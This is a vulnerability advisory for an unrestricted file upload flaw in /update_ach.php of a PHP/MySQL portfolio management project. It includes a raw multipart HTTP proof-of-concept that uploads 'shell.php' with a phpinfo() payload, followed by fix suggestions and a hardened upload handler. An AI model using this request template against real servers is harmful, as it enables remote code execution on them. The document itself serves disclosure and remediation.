1000projects Portfolio Management System MCA Project using PHP and MySQL V1.0 /update_ach.php unrestricted file upload

NAME OF AFFECTED PRODUCT(S)

  • Portfolio Management System MCA Project using PHP and MySQL

Vendor Homepage

Software Link

Vendor

  • 1000projects

Vulnerability Type

  • Unrestricted Upload

Root Cause

  • An arbitrary file upload vulnerability was found in the /update_ach.php file of the "Portfolio Management System MCA Project using PHP and MySQL" project. This vulnerability can be exploited without requiring any special permissions.

Impact

  • Attackers can use this arbitrary file upload vulnerability to take control of the server and achieve remote command execution, which poses a serious threat to system security and business continuity.

DESCRIPTION

  • During the security review of "Portfolio Management System MCA Project using PHP and MySQL", wangjiawei discovered a critical arbitrary file upload vulnerability in the "/update_ach.php" file. This vulnerability can be exploited without requiring any special permissions. Immediate remedial measures are needed to ensure system security and protect data integrity.

Vulnerability details and POC

poc

POST /update_ach.php HTTP/1.1
Host: 192.168.75.230:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------421080354430954489792376579423
Content-Length: 1093
Origin: http://192.168.75.230:8080
Sec-GPC: 1
Connection: close
Referer: http://192.168.75.230:8080/update_ach_details.php?q=MTA=
Cookie: PHPSESSID=1cjhi762j9p9u38q0dhos6fjqn
Upgrade-Insecure-Requests: 1
Priority: u=0, i

-----------------------------421080354430954489792376579423
Content-Disposition: form-data; name="reg_id"

29
-----------------------------421080354430954489792376579423
Content-Disposition: form-data; name="ach_id"

10
-----------------------------421080354430954489792376579423
Content-Disposition: form-data; name="ach_name"

Code Expert
-----------------------------421080354430954489792376579423
Content-Disposition: form-data; name="ach_rank"

3rd
-----------------------------421080354430954489792376579423
Content-Disposition: form-data; name="ach_year"

2017
-----------------------------421080354430954489792376579423
Content-Disposition: form-data; name="ach_certy"; filename="shell.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------421080354430954489792376579423
Content-Disposition: form-data; name="ach_certy_old"

certy2.png
-----------------------------421080354430954489792376579423
Content-Disposition: form-data; name="submit"

Update
-----------------------------421080354430954489792376579423--

Suggested fixes

  1. Store uploaded files in a location separate from the web server (outside the web root).
  2. Rename the uploaded file and replace its file suffix. (To prevent the suffix from being tampered with: validate on the front end, then re-check on the back end; the back-end check is the one that counts.)
  3. Separate the upload path per service, and serve downloads only by the server-generated file name.
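The three fixes above, combined into one hardened handler for the `ach_certy` field that the PoC abuses. This is an added example, not code from the original project; it assumes an `UPLOAD_DIR` outside the document root that the PHP process can write to, and that achievement certificates are PNG or JPEG images.

```php
<?php
// Added example of a hardened handler for the ach_certy upload; not code from the
// original project. Assumed: UPLOAD_DIR lies outside the web root and is writable
// by the PHP process; certificates are PNG or JPEG images.

const UPLOAD_DIR = '/var/app/uploads/achievements'; // assumed path, outside the document root
const MAX_BYTES  = 2 * 1024 * 1024;                  // 2 MiB cap for a certificate image

// Sniffed MIME type => the only extension the server will ever assign.
const ALLOWED_TYPES = ['image/png' => 'png', 'image/jpeg' => 'jpg'];

function store_certificate(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Decide the type from the file's content, never from the client-supplied
    // filename or Content-Type (the PoC sends shell.php as application/octet-stream).
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime])) {
        throw new RuntimeException('unsupported file type');
    }
    // Discard the original name: random base name plus a server-chosen extension.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    $dest = UPLOAD_DIR . DIRECTORY_SEPARATOR . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);  // readable by the app, never executable
    return $name;        // persist this generated name in the achievement record
}

// Serve a stored certificate by its generated name only; no client-controlled
// path reaches the filesystem and PHP never executes the stored file.
function send_certificate(string $name): void
{
    $path = UPLOAD_DIR . DIRECTORY_SEPARATOR . $name;
    if (!preg_match('/^[a-f0-9]{32}\.(png|jpg)$/', $name) || !is_file($path)) {
        http_response_code(404);
        return;
    }
    header('Content-Type: ' . mime_content_type($path));
    header('Content-Disposition: attachment; filename="' . $name . '"');
    header('X-Content-Type-Options: nosniff');
    readfile($path);
}
```

Because the stored name is generated server-side and the directory is outside the web root, a request for `shell.php` has nothing to hit: the name is never kept, and even a stored file is only ever read back as a download, not executed.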